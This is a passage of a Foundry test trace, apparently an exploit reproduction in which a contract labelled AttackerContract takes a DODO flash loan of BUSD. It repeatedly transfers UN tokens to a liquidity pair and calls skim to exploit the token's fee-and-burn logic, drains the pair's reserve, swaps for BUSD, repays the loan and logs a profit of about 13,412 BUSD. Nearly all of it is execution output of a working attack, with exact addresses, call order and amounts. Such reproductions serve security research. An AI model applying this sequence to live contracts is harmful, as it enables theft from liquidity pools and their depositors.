    │   │   │   │   @ 0x1b498645b55561b32ec7b47eb7d0c2f9d70ed906f6663803782fe0588a1d544a: 0x000000000000000000000000000000000000000000000db5e60741f90e188733 → 0x00000000000000000000000000000000000000000000150315b81d4b46507f97
    │   │   │   └─ ← [Return] true
    │   │   ├─ [31770] Pair::skim(AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─ [623] UN::balanceOf(Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1]) [staticcall]
    │   │   │   │   └─ ← [Return] 99226601405563328823191 [9.922e22]
    │   │   │   ├─ [20336] UN::transfer(AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 59090466688948569420188 [5.909e22])
    │   │   │   │   ├─ emit Transfer(from: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], to: 0xa4B5bB109c6508A8Ca880D2b4915139706783b77, value: 1772714000668457082603 [1.772e21])
    │   │   │   │   ├─ [4775] 0xa4B5bB109c6508A8Ca880D2b4915139706783b77::sendReward(1772714000668457082603 [1.772e21])
    │   │   │   │   │   ├─  emit topic 0: 0x92d297ee2a51275277405bdec54dfbcc6dc625f5f0329dd6ad0617501b2500ea
    │   │   │   │   │   │           data: 0x0000000000000000000000001afa48b74ba7ac0c3c5a2c8b7e24eb71d440846f00000000000000000000000000000000000000000000000000000000000000070000000000000000000000000000000000000000000000601959475ddcf69eeb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 25: 0x0000000000000000000000000000000000005da998bdbdd13863721e17d28261 → 0x000000000000000000000000000000000000603badcbc50096ee507bab8ce170
    │   │   │   │   │   │   @ 23: 0x000000000000000000000000000000000000082a5ac5b5f6aba4e498ef0d3f88 → 0x0000000000000000000000000000000000000863b9d16fb2985129dd99b0ff88
    │   │   │   │   │   │   @ 24: 0x0000000000000000000000000000000000003e71107e7e8b7aecf90285cd0622 → 0x0000000000000000000000000000000000004027c9328355b9f437f023abe16d
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ emit Transfer(from: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], to: UN: [0x1aFA48B74bA7aC0C3C5A2c8B7E24eB71D440846F], value: 590904666889485694201 [5.909e20])
    │   │   │   │   ├─ emit Transfer(from: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], to: 0x760FcC8A4d4b6B31E3a2884C9Adf846c47C4e4df, value: 1772714000668457082603 [1.772e21])
    │   │   │   │   ├─ emit Transfer(from: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], to: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 54954134020722169560781 [5.495e22])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 25: 0x0000000000000000000000000000000000005da998bdbdd13863721e17d28261 → 0x000000000000000000000000000000000000603badcbc50096ee507bab8ce170
    │   │   │   │   │   @ 0x1b498645b55561b32ec7b47eb7d0c2f9d70ed906f6663803782fe0588a1d544a: 0x00000000000000000000000000000000000000000000150315b81d4b46507f97 → 0x00000000000000000000000000000000000000000000087fc8c2d267d633cdfb
    │   │   │   │   │   @ 0x5fc83a2bc7ebacaacbe1646d895d99dcc3932b4ffa7be8c622e94af46a14a58c: 0x000000000000000000000000000000000000000000000dad6bf98c458e36fef5 → 0x000000000000000000000000000000000000000000000e0d8552d3a36b2d9de0
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x00000000000000000000000000000000000000000000018948c7d6e7e80c52c0 → 0x000000000000000000000000000000000000000000000d2c5a977b45a9e9918d
    │   │   │   │   │   @ 0xbc795145fbf2c6349d5cb90439cc8746f10b8636e79c4c1a14660f0d65bc3ccd: 0x00000000000000000000000000000000000000000000002365452f80643e8c8a → 0x0000000000000000000000000000000000000000000000436db8474a5890c183
    │   │   │   │   │   @ 0xdec29a630d3a08aa6223d668249d5af21bb59c133ebaef2d1568fd9c4979dc2d: 0x000000000000000000000000000000000000000000000d82cecab6881564bfe7 → 0x000000000000000000000000000000000000000000000de2e823fde5f25b5ed2
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [531] BUSD::balanceOf(Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1]) [staticcall]
    │   │   │   │   └─ ← [Return] 59365810773605712024588 [5.936e22]
    │   │   │   ├─ [3271] BUSD::transfer(AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   │   │   ├─ emit Transfer(from: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], to: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x00000000000000000000000000000000000000000000018948c7d6e7e80c52c0 → 0x000000000000000000000000000000000000000000000d2c5a977b45a9e9918d
    │   │   │   └─ ← [Stop]
    │   │   ├─ [623] UN::balanceOf(AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 62208948838272638488973 [6.22e22]
    │   │   ├─ [44174] UN::transfer(Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], 49767159070618110791178 [4.976e22])
    │   │   │   ├─ emit Transfer(from: UN: [0x1aFA48B74bA7aC0C3C5A2c8B7E24eB71D440846F], to: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], value: 1243838000469027897731 [1.243e21])
    │   │   │   ├─ emit Transfer(from: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], to: 0x0000000000000000000000000000000000000000, value: 19906863628247244316471 [1.99e22])
    │   │   │   ├─ [7804] Pair::sync()
    │   │   │   │   ├─ [623] UN::balanceOf(Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 21473109088836542984263 [2.147e22]
    │   │   │   │   ├─ [531] BUSD::balanceOf(Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 59365810773605712024588 [5.936e22]
    │   │   │   │   ├─ emit Sync(reserve0: 21473109088836542984263 [2.147e22], reserve1: 59365810773605712024588 [5.936e22])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x647f2509000000000c923a1ffd0c722e540c00000000087fc8c2d267d633cdfb → 0x647f2509000000000c923a1ffd0c722e540c00000000048c0f4062e391fef047
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Transfer(from: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xa4B5bB109c6508A8Ca880D2b4915139706783b77, value: 1642316249330397656103 [1.642e21])
    │   │   │   ├─ [4775] 0xa4B5bB109c6508A8Ca880D2b4915139706783b77::sendReward(1642316249330397656103 [1.642e21])
    │   │   │   │   ├─  emit topic 0: 0x92d297ee2a51275277405bdec54dfbcc6dc625f5f0329dd6ad0617501b2500ea
    │   │   │   │   │           data: 0x0000000000000000000000001afa48b74ba7ac0c3c5a2c8b7e24eb71d440846f000000000000000000000000000000000000000000000000000000000000000700000000000000000000000000000000000000000000005907b76766ce36b42700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 23: 0x0000000000000000000000000000000000000863b9d16fb2985129dd99b0ff88 → 0x0000000000000000000000000000000000000898e082ab83a77f287b1b39d5af
    │   │   │   │   │   @ 25: 0x000000000000000000000000000000000000603badcbc50096ee507bab8ce170 → 0x000000000000000000000000000000000000629d5a8f9140814931980d6ce442
    │   │   │   │   │   @ 24: 0x0000000000000000000000000000000000004027c9328355b9f437f023abe16d → 0x00000000000000000000000000000000000041be3c5fb62b00db78b24af929e5
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Transfer(from: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: UN: [0x1aFA48B74bA7aC0C3C5A2c8B7E24eB71D440846F], value: 497671590706181107910 [4.976e20])
    │   │   │   ├─ emit Transfer(from: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x760FcC8A4d4b6B31E3a2884C9Adf846c47C4e4df, value: 1592549090259779545312 [1.592e21])
    │   │   │   ├─ emit Transfer(from: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 995343181412362215820 [9.953e20])
    │   │   │   ├─ emit Transfer(from: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], value: 45039278958909390266033 [4.503e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xad3228b676f7d3cd4284a5443f17f1962b36e491b30a40b2405849e597ba5fb5: 0x000000000000000000000000000000000000000000004800c70f86adcff6ffa6 → 0x000000000000000000000000000000000000000000004c6de373936d27c68069
    │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000000d2c5a977b45a9e9918d → 0x0000000000000000000000000000000000000000000002a27884b24121fb8383
    │   │   │   │   @ 12: 0 → 1
    │   │   │   │   @ 0x5fc83a2bc7ebacaacbe1646d895d99dcc3932b4ffa7be8c622e94af46a14a58c: 0x000000000000000000000000000000000000000000000e0d8552d3a36b2d9de0 → 0x000000000000000000000000000000000000000000000e668d0a3b0a39645207
    │   │   │   │   @ 0xbc795145fbf2c6349d5cb90439cc8746f10b8636e79c4c1a14660f0d65bc3ccd: 0x0000000000000000000000000000000000000000000000436db8474a5890c183 → 0x00000000000000000000000000000000000000000000001afa94aaf85d84f0c6
    │   │   │   │   @ 25: 0x000000000000000000000000000000000000603badcbc50096ee507bab8ce170 → 0x000000000000000000000000000000000000629d5a8f9140814931980d6ce442
    │   │   │   │   @ 0xdec29a630d3a08aa6223d668249d5af21bb59c133ebaef2d1568fd9c4979dc2d: 0x000000000000000000000000000000000000000000000de2e823fde5f25b5ed2 → 0x000000000000000000000000000000000000000000000e393d32edcd8404c7b2
    │   │   │   │   @ 0x1b498645b55561b32ec7b47eb7d0c2f9d70ed906f6663803782fe0588a1d544a: 0x00000000000000000000000000000000000000000000087fc8c2d267d633cdfb → 0x000000000000000000000000000000000000000000000e15a4ced3b0a17e0ef8
    │   │   │   │   @ 3: 0x00000000000000000000000000000000000000000007b59387f4f3ecaa1200b4 → 0x00000000000000000000000000000000000000000007acb94f2cda6dfa72ff2e
    │   │   │   └─ ← [Return] true
    │   │   ├─ [31770] Pair::skim(AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─ [623] UN::balanceOf(Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1]) [staticcall]
    │   │   │   │   └─ ← [Return] 66512388047745933250296 [6.651e22]
    │   │   │   ├─ [20336] UN::transfer(AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 45039278958909390266033 [4.503e22])
    │   │   │   │   ├─ emit Transfer(from: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], to: 0xa4B5bB109c6508A8Ca880D2b4915139706783b77, value: 1351178368767281707980 [1.351e21])
    │   │   │   │   ├─ [4775] 0xa4B5bB109c6508A8Ca880D2b4915139706783b77::sendReward(1351178368767281707980 [1.351e21])
    │   │   │   │   │   ├─  emit topic 0: 0x92d297ee2a51275277405bdec54dfbcc6dc625f5f0329dd6ad0617501b2500ea
    │   │   │   │   │   │           data: 0x0000000000000000000000001afa48b74ba7ac0c3c5a2c8b7e24eb71d440846f00000000000000000000000000000000000000000000000000000000000000070000000000000000000000000000000000000000000000493f5ddf8b4595bbcc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 25: 0x000000000000000000000000000000000000629d5a8f9140814931980d6ce442 → 0x0000000000000000000000000000000000006492f32c00468b67beb80ff61714
    │   │   │   │   │   │   @ 24: 0x00000000000000000000000000000000000041be3c5fb62b00db78b24af929e5 → 0x000000000000000000000000000000000000430ca21d55845cefd6c7a1ff4bc6
    │   │   │   │   │   │   @ 23: 0x0000000000000000000000000000000000000898e082ab83a77f287b1b39d5af → 0x00000000000000000000000000000000000008c49b1b777d9de0583af16fce4c
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ emit Transfer(from: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], to: UN: [0x1aFA48B74bA7aC0C3C5A2c8B7E24eB71D440846F], value: 450392789589093902660 [4.503e20])
    │   │   │   │   ├─ emit Transfer(from: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], to: 0x760FcC8A4d4b6B31E3a2884C9Adf846c47C4e4df, value: 1351178368767281707980 [1.351e21])
    │   │   │   │   ├─ emit Transfer(from: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], to: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 41886529431785732947413 [4.188e22])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xdec29a630d3a08aa6223d668249d5af21bb59c133ebaef2d1568fd9c4979dc2d: 0x000000000000000000000000000000000000000000000e393d32edcd8404c7b2 → 0x000000000000000000000000000000000000000000000e827c90cd58c99a837e
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000002a27884b24121fb8383 → 0x000000000000000000000000000000000000000000000b8124e2c41e8f1d4158
    │   │   │   │   │   @ 25: 0x000000000000000000000000000000000000629d5a8f9140814931980d6ce442 → 0x0000000000000000000000000000000000006492f32c00468b67beb80ff61714
    │   │   │   │   │   @ 0x5fc83a2bc7ebacaacbe1646d895d99dcc3932b4ffa7be8c622e94af46a14a58c: 0x000000000000000000000000000000000000000000000e668d0a3b0a39645207 → 0x000000000000000000000000000000000000000000000eafcc681a957efa0dd3
    │   │   │   │   │   @ 0x1b498645b55561b32ec7b47eb7d0c2f9d70ed906f6663803782fe0588a1d544a: 0x000000000000000000000000000000000000000000000e15a4ced3b0a17e0ef8 → 0x00000000000000000000000000000000000000000000048c0f4062e391fef047
    │   │   │   │   │   @ 0xbc795145fbf2c6349d5cb90439cc8746f10b8636e79c4c1a14660f0d65bc3ccd: 0x00000000000000000000000000000000000000000000001afa94aaf85d84f0c6 → 0x00000000000000000000000000000000000000000000003365094ad174b6da0a
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [531] BUSD::balanceOf(Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1]) [staticcall]
    │   │   │   │   └─ ← [Return] 59365810773605712024588 [5.936e22]
    │   │   │   ├─ [3271] BUSD::transfer(AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   │   │   ├─ emit Transfer(from: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], to: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000002a27884b24121fb8383 → 0x000000000000000000000000000000000000000000000b8124e2c41e8f1d4158
    │   │   │   └─ ← [Stop]
    │   │   ├─ [517] Pair::getReserves() [staticcall]
    │   │   │   └─ ← [Return] 21473109088836542984263 [2.147e22], 59365810773605712024588 [5.936e22], 1686054153 [1.686e9]
    │   │   ├─ [623] UN::balanceOf(AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 54328319199440260645208 [5.432e22]
    │   │   ├─ [44174] UN::transfer(Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], 54328319199440260645208 [5.432e22])
    │   │   │   ├─ emit Transfer(from: UN: [0x1aFA48B74bA7aC0C3C5A2c8B7E24eB71D440846F], to: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], value: 948064380295275010570 [9.48e20])
    │   │   │   ├─ emit Transfer(from: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], to: 0x0000000000000000000000000000000000000000, value: 21731327679776104258083 [2.173e22])
    │   │   │   ├─ [7804] Pair::sync()
    │   │   │   │   ├─ [623] UN::balanceOf(Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 689845789355713736750 [6.898e20]
    │   │   │   │   ├─ [531] BUSD::balanceOf(Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 59365810773605712024588 [5.936e22]
    │   │   │   │   ├─ emit Sync(reserve0: 689845789355713736750 [6.898e20], reserve1: 59365810773605712024588 [5.936e22])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x647f2509000000000c923a1ffd0c722e540c00000000048c0f4062e391fef047 → 0x647f2509000000000c923a1ffd0c722e540c000000000025658892759a43b02e
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Transfer(from: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xa4B5bB109c6508A8Ca880D2b4915139706783b77, value: 1792834533581528601285 [1.792e21])
    │   │   │   ├─ [4775] 0xa4B5bB109c6508A8Ca880D2b4915139706783b77::sendReward(1792834533581528601285 [1.792e21])
    │   │   │   │   ├─  emit topic 0: 0x92d297ee2a51275277405bdec54dfbcc6dc625f5f0329dd6ad0617501b2500ea
    │   │   │   │   │           data: 0x0000000000000000000000001afa48b74ba7ac0c3c5a2c8b7e24eb71d440846f00000000000000000000000000000000000000000000000000000000000000070000000000000000000000000000000000000000000000613093c572ac2592c500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 25: 0x0000000000000000000000000000000000006492f32c00468b67beb80ff61714 → 0x000000000000000000000000000000000000672c805f494461c10bd73f107350
    │   │   │   │   │   @ 24: 0x000000000000000000000000000000000000430ca21d55845cefd6c7a1ff4bc6 → 0x00000000000000000000000000000000000044c85594db82ebd60a36521e252f
    │   │   │   │   │   @ 23: 0x00000000000000000000000000000000000008c49b1b777d9de0583af16fce4c → 0x00000000000000000000000000000000000008fea0da5bb8814d37907cfc6a9a
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Transfer(from: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: UN: [0x1aFA48B74bA7aC0C3C5A2c8B7E24eB71D440846F], value: 543283191994402606450 [5.432e20])
    │   │   │   ├─ emit Transfer(from: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x760FcC8A4d4b6B31E3a2884C9Adf846c47C4e4df, value: 1738506214382088340640 [1.738e21])
    │   │   │   ├─ emit Transfer(from: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 1086566383988805212900 [1.086e21])
    │   │   │   ├─ emit Transfer(from: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], value: 49167128875493435883933 [4.916e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xdec29a630d3a08aa6223d668249d5af21bb59c133ebaef2d1568fd9c4979dc2d: 0x000000000000000000000000000000000000000000000e827c90cd58c99a837e → 0x000000000000000000000000000000000000000000000ee0bb2f9c539f14481e
    │   │   │   │   @ 0x1b498645b55561b32ec7b47eb7d0c2f9d70ed906f6663803782fe0588a1d544a: 0x00000000000000000000000000000000000000000000048c0f4062e391fef047 → 0x000000000000000000000000000000000000000000000a8ec083e01b7f9f71cb
    │   │   │   │   @ 3: 0x00000000000000000000000000000000000000000007acb94f2cda6dfa72ff2e → 0x00000000000000000000000000000000000000000007a30f6364213596b69520
    │   │   │   │   @ 0xbc795145fbf2c6349d5cb90439cc8746f10b8636e79c4c1a14660f0d65bc3ccd: 0x00000000000000000000000000000000000000000000003365094ad174b6da0a → 0x00000000000000000000000000000000000000000000001d7391a0ae62b60d72
    │   │   │   │   @ 12: 0 → 1
    │   │   │   │   @ 0xad3228b676f7d3cd4284a5443f17f1962b36e491b30a40b2405849e597ba5fb5: 0x000000000000000000000000000000000000000000004c6de373936d27c68069 → 0x000000000000000000000000000000000000000000005142d957f00959a4b570
    │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000000b8124e2c41e8f1d4158 → 0
    │   │   │   │   @ 0x5fc83a2bc7ebacaacbe1646d895d99dcc3932b4ffa7be8c622e94af46a14a58c: 0x000000000000000000000000000000000000000000000eafcc681a957efa0dd3 → 0x000000000000000000000000000000000000000000000f10fcfbe0082b1fa098
    │   │   │   │   @ 25: 0x0000000000000000000000000000000000006492f32c00468b67beb80ff61714 → 0x000000000000000000000000000000000000672c805f494461c10bd73f107350
    │   │   │   └─ ← [Return] true
    │   │   ├─ [16815] Pair::swap(0, 42512363310180390856151 [4.251e22], AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   ├─ [3271] BUSD::transfer(AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 42512363310180390856151 [4.251e22])
    │   │   │   │   ├─ emit Transfer(from: Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1], to: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 42512363310180390856151 [4.251e22])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xd8776b14a84cffc722c75739a5b9592d5b44bb8fdfb6c5600d40936816dce39e: 0x000000000000000000000000000000000000000000000c923a1ffd0c722e540c → 0x000000000000000000000000000000000000000000000391a0915697fe736e35
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000000900998ea67473bae5d7
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [623] UN::balanceOf(Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1]) [staticcall]
    │   │   │   │   └─ ← [Return] 49856974664849149620683 [4.985e22]
    │   │   │   ├─ [531] BUSD::balanceOf(Pair: [0x5F739a4AdE4341D4AEe049E679095BcCbe904Ee1]) [staticcall]
    │   │   │   │   └─ ← [Return] 16853447463425321168437 [1.685e22]
    │   │   │   ├─ emit Sync(reserve0: 49856974664849149620683 [4.985e22], reserve1: 16853447463425321168437 [1.685e22])
    │   │   │   ├─ emit Swap(sender: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 49167128875493435883933 [4.916e22], amount1In: 0, amount0Out: 0, amount1Out: 42512363310180390856151 [4.251e22], to: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 8: 0x647f2509000000000c923a1ffd0c722e540c000000000025658892759a43b02e → 0x647f2509000000000391a0915697fe736e35000000000a8ec083e01b7f9f71cb
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3271] BUSD::transfer(DPPOracle: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681], 29100000000000000000000 [2.91e22])
    │   │   │   ├─ emit Transfer(from: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: DPPOracle: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681], value: 29100000000000000000000 [2.91e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xa1bb3ea675b840e963c59cc969a45ddfeefd63ae58d64dc7dba145305988350c: 0x0000000000000000000000000000000000000000000077578a7d0a0ebeadd1d0 → 0x000000000000000000000000000000000000000000007d810e1d17a659ddd1d0
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000900998ea67473bae5d7 → 0x0000000000000000000000000000000000000000000002d715ee98dcd88ae5d7
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0x1b498645b55561b32ec7b47eb7d0c2f9d70ed906f6663803782fe0588a1d544a: 0x000000000000000000000000000000000000000000000db5e60741f90e188733 → 0x000000000000000000000000000000000000000000000a8ec083e01b7f9f71cb
    │   │   │   @ 0xd8776b14a84cffc722c75739a5b9592d5b44bb8fdfb6c5600d40936816dce39e: 0x000000000000000000000000000000000000000000000668b65c6882673d540c → 0x000000000000000000000000000000000000000000000c923a1ffd0c722e540c
    │   │   │   @ 12: 0 → 1
    │   │   └─ ← [Stop]
    │   ├─ [2534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(DPPOracle: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681]) [staticcall]
    │   │   └─ ← [Return] 74515087607638180967 [7.451e19]
    │   ├─ [531] BUSD::balanceOf(DPPOracle: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681]) [staticcall]
    │   │   └─ ← [Return] 592676457339308279189968 [5.926e23]
    │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(DPPOracle: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681]) [staticcall]
    │   │   └─ ← [Return] 74515087607638180967 [7.451e19]
    │   ├─ [531] BUSD::balanceOf(DPPOracle: [0xFeAFe253802b77456B4627F8c2306a9CeBb5d681]) [staticcall]
    │   │   └─ ← [Return] 592676457339308279189968 [5.926e23]
    │   ├─ emit DODOFlashLoan(: AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 0, : 29100000000000000000000 [2.91e22])
    │   └─ ← [Stop]
    ├─ [531] BUSD::balanceOf(AttackerContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 13412363310180390856151 [1.341e22]
    ├─ [425] BUSD::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker BUSD balance after attack", val: 13412363310180390856151 [1.341e22], decimals: 18)
    ├─  storage changes:
    │   @ 1: 0x0000000000000000010001010000000000000000000000000000000000000000 → 0x0000000000000000010000010000000000000000000000000000000000000000
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 15.40s (13.40s CPU time)

Ran 2 test suites in 16.58s (17.07s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
